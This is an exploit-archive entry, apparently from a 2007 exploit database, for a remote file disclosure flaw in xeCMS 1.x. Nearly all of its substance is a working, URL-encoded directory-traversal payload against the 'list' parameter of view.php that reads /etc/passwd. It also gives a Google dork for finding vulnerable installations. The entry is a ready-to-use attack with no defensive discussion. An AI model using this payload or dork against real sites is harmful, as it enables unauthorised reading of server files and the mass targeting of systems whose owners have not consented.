xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability
# Published : 2007-12-19
# Author : p4imi0
# Previous Title : GF-3XPLORER 2.4 (XSS/LFI/Etc.) Multiple Remote Vulnerabilities
# Next Title : MOG-WebShop (index.php group) Remote SQL Injection Exploit

--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------

download    : http://xecms.sunsite.dk/
author      : p4imi0
contact     : p4imi0@gmail.com
exploit     : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to   : str0ke, Cr[]w.

# www.Syue.com [2007-12-19]